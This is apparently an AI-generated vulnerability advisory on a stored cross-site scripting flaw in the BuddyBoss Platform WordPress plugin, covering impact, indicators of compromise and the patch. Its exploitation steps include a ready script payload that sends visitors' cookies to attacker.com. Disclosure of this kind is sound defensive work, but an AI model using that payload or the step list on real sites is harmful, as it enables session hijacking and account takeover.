CVE-2026-96554: 
WordPress vulnerability analysis and mitigation

Overview

CVE-2026-96554 is a stored cross-site scripting (XSS) vulnerability in the BuddyBoss Platform WordPress plugin affecting all versions up to and including 3.6.0. The flaw exists in the "Group Name" input field, which is not properly sanitized or escaped before being stored and rendered. Authenticated attackers with subscriber-level access or higher can inject malicious JavaScript that executes in the browsers of users who view the affected group page. This vulnerability is exploitable by default, as social group creation is enabled for all members out of the box. It carries an estimated CVSS severity of Medium (Feedly, VulDB).

Technical details

The root cause is improper neutralization of input during web page generation (CWE-79 — Stored XSS). The BuddyBoss Platform plugin fails to sanitize or escape user-supplied input in the "Group Name" field before persisting it to the database and rendering it in HTML output. An authenticated subscriber-level user can create a social group with a crafted name containing a malicious script payload; the payload is stored server-side and executed in the victim's browser whenever the group page is visited. Exploitation requires that the "social group creation" feature is enabled for all members, which is the default plugin configuration (Feedly, Offseq Radar).

Impact

Successful exploitation allows an attacker to execute arbitrary JavaScript in the browsers of any user who views the compromised group page, including administrators. This can lead to session cookie theft, credential harvesting, account takeover, defacement of the affected page, or redirection of victims to malicious sites. Because the payload persists server-side and affects all visitors, the blast radius extends to the entire user base of the WordPress site (Feedly, Offseq Radar).

Exploitability

No public proof-of-concept exploit code or evidence of in-the-wild exploitation has been reported at this time. The vulnerability requires only subscriber-level authentication, which significantly lowers the barrier to exploitation on sites that allow open user registration. No EPSS score or CISA KEV catalog listing has been identified for this CVE (Feedly, VulDB).

Exploitation steps

  1. Reconnaissance: Identify WordPress sites running BuddyBoss Platform plugin version 3.6.0 or earlier with open user registration enabled.
  2. Account Creation: Register a subscriber-level account on the target WordPress site.
  3. Navigate to Group Creation: Log in and navigate to the social groups section where group creation is permitted for all members (default configuration).
  4. Inject Malicious Payload: In the "Group Name" field, enter a crafted XSS payload such as <script>document.location='https://attacker.com/steal?c='+document.cookie</script> or an equivalent obfuscated variant.
  5. Submit and Store: Submit the group creation form; the unsanitized payload is stored in the WordPress database.
  6. Trigger Execution: When any authenticated or unauthenticated user (depending on site visibility settings) visits the group listing or group detail page, the injected script executes in their browser, enabling session hijacking, credential theft, or further attacks (Feedly, Offseq Radar).

Indicators of compromise

  • Logs: WordPress access logs showing POST requests to group creation endpoints (e.g., /wp-admin/admin-ajax.php or BuddyBoss group creation URLs) containing HTML/JavaScript tags or encoded script payloads in the group name parameter.
  • Database: Entries in the WordPress database (typically wp_bp_groups table) where the name column contains <script>, javascript:, onerror=, or other XSS indicators.
  • Network: Outbound requests from victim browsers to unexpected external domains shortly after visiting group pages, potentially carrying cookie or session data in query parameters.
  • Browser/Client: Unexpected redirects or pop-ups experienced by users when browsing BuddyBoss group pages on the affected site.

Mitigation and workarounds

BuddyBoss has released version 3.6.1 of the BuddyBoss Platform plugin, which addresses this vulnerability by properly sanitizing and escaping the "Group Name" input. Site administrators should update to version 3.6.1 or later immediately. As a temporary workaround prior to patching, administrators can disable social group creation for non-administrator roles via the BuddyBoss Platform settings to eliminate the attack surface (Feedly).

Additional resources


Source: This report was generated using AI

Related WordPress vulnerabilities:

CVE ID

Severity

Score

Technologies

Component name

CISA KEV exploit

Has fix

Published date

CVE-2026-109197HIGH7.5
  • wpdirectorykit
NoYesOct 31, 2026
CVE-2026-120114HIGH7.2
  • debug-log-manager
NoYesOct 31, 2026
CVE-2026-15272MEDIUM6.5
  • w2dc
NoYesOct 31, 2026
CVE-2026-96554MEDIUM6.4
  • buddyboss-platform
NoYesOct 31, 2026
CVE-2026-116752MEDIUM6.4
  • geodirectory
NoYesOct 31, 2026

Free Vulnerability Assessment

Benchmark your Cloud Security Posture

Evaluate your cloud security practices across 9 security domains to benchmark your risk level and identify gaps in your defenses.

Request assessment

Additional Wiz resources

Get a personalized demo

Ready to see Wiz in action?

"Best User Experience I have ever seen, provides full visibility to cloud workloads."
David EstlickCISO
"Wiz provides a single pane of glass to see what is going on in our cloud environments."
Adam FletcherChief Security Officer
"We know that if Wiz identifies something as critical, it actually is."
Greg PoniatowskiHead of Threat and Vulnerability Management